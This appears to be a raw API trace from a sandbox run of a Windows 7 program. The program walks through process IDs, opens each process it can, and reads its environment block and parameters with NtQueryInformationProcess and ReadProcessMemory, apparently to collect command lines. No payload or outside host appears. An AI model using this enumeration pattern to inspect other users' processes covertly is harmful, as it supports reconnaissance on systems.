[0572.604] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.615] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
[0572.615] CloseHandle (hObject=0x0) returned 0
[0572.615] _ui64tow (_Value=0x1b4, _Buffer="396", _Radix=10) returned="436"
[0572.617] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="436") returned 3
[0572.618] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.618] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.628] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1b4) returned 0x0
[0572.629] CloseHandle (hObject=0x0) returned 0
[0572.629] _ui64tow (_Value=0x1d0, _Buffer="436", _Radix=10) returned="464"
[0572.631] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="464") returned 3
[0572.631] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.632] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.658] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0
[0572.659] CloseHandle (hObject=0x0) returned 0
[0572.660] _ui64tow (_Value=0x1dc, _Buffer="464", _Radix=10) returned="476"
[0572.664] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="476") returned 3
[0572.665] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.665] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.685] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0
[0572.685] CloseHandle (hObject=0x0) returned 0
[0572.686] _ui64tow (_Value=0x1e4, _Buffer="476", _Radix=10) returned="484"
[0572.688] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="484") returned 3
[0572.689] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.689] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.703] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0
[0572.703] CloseHandle (hObject=0x0) returned 0
[0572.704] _ui64tow (_Value=0x260, _Buffer="484", _Radix=10) returned="608"
[0572.706] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="608") returned 3
[0572.707] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.707] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.723] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x260) returned 0x0
[0572.723] CloseHandle (hObject=0x0) returned 0
[0572.725] _ui64tow (_Value=0x2a0, _Buffer="608", _Radix=10) returned="672"
[0572.732] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="672") returned 3
[0572.736] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.736] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.757] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2a0) returned 0x0
[0572.757] CloseHandle (hObject=0x0) returned 0
[0572.757] _ui64tow (_Value=0x2d0, _Buffer="672", _Radix=10) returned="720"
[0572.761] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="720") returned 3
[0572.762] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.762] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.777] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2d0) returned 0x0
[0572.777] CloseHandle (hObject=0x0) returned 0
[0572.777] _ui64tow (_Value=0x348, _Buffer="720", _Radix=10) returned="840"
[0572.780] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="840") returned 3
[0572.781] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.781] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.793] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x348) returned 0x0
[0572.793] CloseHandle (hObject=0x0) returned 0
[0572.794] _ui64tow (_Value=0x370, _Buffer="840", _Radix=10) returned="880"
[0572.796] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="880") returned 3
[0572.796] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.796] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.806] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0
[0572.806] CloseHandle (hObject=0x0) returned 0
[0572.807] _ui64tow (_Value=0x3ac, _Buffer="880", _Radix=10) returned="940"
[0572.809] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="940") returned 3
[0572.810] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.810] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.821] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0
[0572.822] CloseHandle (hObject=0x0) returned 0
[0572.822] _ui64tow (_Value=0x120, _Buffer="940", _Radix=10) returned="288"
[0572.824] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="288") returned 3
[0572.825] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.825] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.836] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x120) returned 0x0
[0572.836] CloseHandle (hObject=0x0) returned 0
[0572.836] _ui64tow (_Value=0x164, _Buffer="288", _Radix=10) returned="356"
[0572.838] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="356") returned 3
[0572.839] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.840] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.851] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x164) returned 0x1f4
[0572.851] GetLastError () returned 0x0
[0572.851] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0572.851] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd6018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0572.851] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0572.851] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2227f0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0572.851] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x222688, lpBuffer=0xced2a0, nSize=0x38, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0572.852] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0572.852] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0572.852] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd6020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0572.852] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x221e60, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0572.853] malloc (_Size=0x3e) returned 0x3ed180
[0572.853] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2226c0, lpBuffer=0x3ed180, nSize=0x3c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3ed180*, lpNumberOfBytesRead=0x0) returned 1
[0572.853] free (_Block=0x3ed180)
[0572.854] CloseHandle (hObject=0x1f4) returned 1
[0572.854] _ui64tow (_Value=0x420, _Buffer="356", _Radix=10) returned="1056"
[0572.857] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1056") returned 4
[0572.857] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.857] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.872] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x420) returned 0x0
[0572.872] CloseHandle (hObject=0x0) returned 0
[0572.872] _ui64tow (_Value=0x484, _Buffer="1056", _Radix=10) returned="1156"
[0572.875] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1156") returned 4
[0572.876] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.876] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.892] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x484) returned 0x0
[0572.892] CloseHandle (hObject=0x0) returned 0
[0572.893] _ui64tow (_Value=0x4a4, _Buffer="1156", _Radix=10) returned="1188"
[0572.896] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1188") returned 4
[0572.897] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.897] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.910] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4a4) returned 0x1f4
[0572.910] GetLastError () returned 0x0
[0572.910] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0572.910] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffde018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0572.910] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0572.910] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2a27c0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0572.910] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2a2688, lpBuffer=0xced2a0, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0572.911] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0572.911] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0572.911] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffde020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0572.911] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2a1e60, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0572.912] malloc (_Size=0x20) returned 0x3efdb0
[0572.912] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2a26ca, lpBuffer=0x3efdb0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3efdb0*, lpNumberOfBytesRead=0x0) returned 1
[0572.912] free (_Block=0x3efdb0)
[0572.913] CloseHandle (hObject=0x1f4) returned 1
[0572.913] _ui64tow (_Value=0x4bc, _Buffer="1188", _Radix=10) returned="1212"
[0572.915] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1212") returned 4
[0572.916] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.916] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.928] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0
[0572.928] CloseHandle (hObject=0x0) returned 0
[0572.929] _ui64tow (_Value=0x4fc, _Buffer="1212", _Radix=10) returned="1276"
[0572.931] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1276") returned 4
[0572.932] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.932] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.955] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4fc) returned 0x1f4
[0572.955] GetLastError () returned 0x0
[0572.955] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0572.955] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd9018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0572.955] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0572.956] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2728b0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0572.956] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x272688, lpBuffer=0xced2a0, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0572.956] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0572.957] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0572.957] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd9020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0572.957] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x271e60, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0572.957] malloc (_Size=0x116) returned 0x3f1710
[0572.957] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2726c8, lpBuffer=0x3f1710, nSize=0x114, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3f1710*, lpNumberOfBytesRead=0x0) returned 1
[0572.958] free (_Block=0x3f1710)
[0572.958] CloseHandle (hObject=0x1f4) returned 1
[0572.959] _ui64tow (_Value=0x640, _Buffer="1276", _Radix=10) returned="1600"
[0572.961] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1600") returned 4
[0572.962] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.962] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.987] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x640) returned 0x1f4
[0572.987] GetLastError () returned 0x0
[0572.987] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0572.988] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffdf018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0572.988] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0572.988] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x112820, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0572.988] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x1126a6, lpBuffer=0xced2a0, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0572.989] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0572.989] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0572.989] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffdf020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0572.989] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x111e90, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0572.989] malloc (_Size=0x32) returned 0x3ee140
[0572.990] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x1126d6, lpBuffer=0x3ee140, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3ee140*, lpNumberOfBytesRead=0x0) returned 1
[0572.990] free (_Block=0x3ee140)
[0572.991] CloseHandle (hObject=0x1f4) returned 1
[0572.991] _ui64tow (_Value=0x598, _Buffer="1600", _Radix=10) returned="1432"
[0572.993] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1432") returned 4
[0572.994] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
